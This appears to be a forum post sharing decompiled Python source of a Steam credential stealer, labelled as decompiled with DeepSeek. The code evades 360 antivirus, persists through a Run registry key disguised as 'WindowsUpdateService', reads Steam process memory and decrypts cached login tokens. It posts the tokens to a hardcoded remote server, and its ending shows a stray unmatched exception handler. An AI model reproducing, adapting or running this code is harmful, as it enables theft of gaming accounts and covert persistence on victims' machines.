deepseek 反编译:- import datetime
- import os
- import zlib
- import win32crypt
- import vdf
- from io import StringIO
- import ctypes as utisk
- import re
- import subprocess as pd
- import requests as mibfn
- import jwt as rekskd
- import time as utui
- import sys
- import win32com.client as win32com
- import pythoncom
- import winreg
- def is_360_running():
- process_names = ['360Safe.exe', '360Tray.exe', '360sd.exe', '360rp.exe', 'QHActiveDefense.exe']
- try:
- output = pd.check_output('tasklist', shell=True, text=True).lower()
- for name in process_names:
- if name.lower() in output:
- return True
- return False
- except Exception as e:
- return False
- def add_to_registry_startup():
- if is_360_running():
- print('2')
- return
- try:
- exe_path = sys.executable if getattr(sys, 'frozen', False) else os.path.abspath(sys.argv[0])
- key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Run', 0, winreg.KEY_SET_VALUE)
- winreg.SetValueEx(key, 'WindowsUpdateService', 0, winreg.REG_SZ, exe_path)
- winreg.CloseKey(key)
- print('1')
- except Exception as e:
- print('3')
- def extract_tokens(value):
- return re.findall(r'eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+', value)
- def check_aud(tokens):
- for token in tokens:
- try:
- decoded = rekskd.decode(token, options={'verify_signature': False})
- aud = decoded.get('aud', [])
- if all(item in aud for item in ('client', 'web', 'renew', 'derive')):
- return token
- except rekskd.ExpiredSignatureError:
- continue
- except rekskd.DecodeError:
- continue
- return None
- def scan_memory(pid):
- PROCESS_VM_READ = 0x10
- process_handle = utisk.windll.kernel32.OpenProcess(PROCESS_VM_READ, False, pid)
- if not process_handle:
- print('4')
- return None
-
- buffer = utisk.create_string_buffer(4096)
- found_token = None
-
- for address in range(0, 0x7FFFFFFF, 4096):
- try:
- bytes_read = utisk.c_size_t()
- if utisk.windll.kernel32.ReadProcessMemory(process_handle, address, buffer, utisk.sizeof(buffer), utisk.byref(bytes_read)):
- value = buffer.raw.decode('latin-1', errors='ignore')
- if 'eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0' in value:
- tokens = extract_tokens(value)
- if tokens:
- token = check_aud(tokens)
- if token:
- found_token = token
- break
- except Exception:
- continue
-
- utisk.windll.kernel32.CloseHandle(process_handle)
- return found_token
- def get_steam_process_id():
- try:
- output = pd.check_output('tasklist | findstr steam.exe', shell=True, text=True)
- for line in output.splitlines():
- if 'steam' in line:
- parts = line.split()
- if len(parts) >= 2:
- return int(parts[1])
- return None
- except Exception as e:
- print('5')
- return None
- def get_steam_install_path() -> str:
- import winreg
- key_path = r'Software\Classes\steam\Shell\Open\Command'
- try:
- key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path, 0, winreg.KEY_READ)
- value, _ = winreg.QueryValueEx(key, '')
- winreg.CloseKey(key)
- return os.path.dirname(value.strip('"'))
- except Exception:
- return ''
- def get_local_appdata_path() -> str:
- return os.getenv('LOCALAPPDATA', '')
- def compute_crc32(data: str) -> str:
- crc32_value = zlib.crc32(data.encode('utf-8'))
- return format(crc32_value, '08x').lstrip('0')
- def decrypt_data(encrypted_data: bytes, account_name: str) -> bytes:
- key = account_name.encode('utf-8')
- decrypted = win32crypt.CryptUnprotectData(encrypted_data, key, None, None, 0)
- return decrypted[1]
- def send_token(steam_id, token, account_name=None):
- try:
- url = 'http://101.43.0.123:4531/aer.php'
- data = {'id': steam_id, 'th': token}
- response = mibfn.post(url, data=data)
- if account_name:
- print(f"{steam_id} | 1")
- else:
- print(f"{steam_id} | 1")
- except Exception as e:
- if account_name:
- print(f"{steam_id} | 6")
- else:
- print(f"{steam_id} | 6")
- def main():
- pid = get_steam_process_id()
- if pid and (token := scan_memory(pid)):
- try:
- decoded = rekskd.decode(token, options={'verify_signature': False})
- steam_id = decoded.get('sub')
- send_token(steam_id, token)
- except Exception:
- print('7')
-
- steam_path = get_steam_install_path()
- local_path = get_local_appdata_path()
-
- loginusers_path = os.path.join(steam_path, 'config', 'loginusers.vdf')
- local_vdf_path = os.path.join(local_path, 'Steam', 'local.vdf')
-
- try:
- with open(loginusers_path, 'r', encoding='utf-8') as file_loginusers:
- input_loginusers = file_loginusers.read()
- except FileNotFoundError:
- print('8')
- return
-
- try:
- with open(local_vdf_path, 'r', encoding='utf-8') as file_local:
- input_local = file_local.read()
- except FileNotFoundError:
- print('9')
- return
-
- loginuser = vdf.loads(input_loginusers)
- local = vdf.loads(input_local)
-
- connectcache = local.get('MachineUserConfigStore', {}).get('Software', {}).get('Valve', {}).get('Steam', {}).get('ConnectCache', {})
- if not connectcache:
- print('10')
- return
-
- users = loginuser.get('users', {})
- if not users:
- print('11')
- return
-
- for user_id, subuser in users.items():
- account_name = subuser.get('AccountName', '')
- if not account_name:
- continue
-
- crc32 = compute_crc32(account_name) + '1'
- encrypted_hex = connectcache.get(crc32, '')
- if not encrypted_hex:
- print(f"{user_id} | 12")
- continue
-
- encrypted_data = bytes.fromhex(encrypted_hex)
- try:
- decrypted_data = decrypt_data(encrypted_data, account_name)
- token = decrypted_data.decode('utf-8')
- decoded = rekskd.decode(token, options={'verify_signature': False})
- steam_id = decoded.get('sub')
- send_token(steam_id, token, account_name)
- except Exception:
- print(f"{user_id} | 13")
- except Exception:
- print(f"{user_id} | 14")
- if __name__ == '__main__':
- add_to_registry_startup()
- while True:
- main()
- utui.sleep(5)
复制代码
|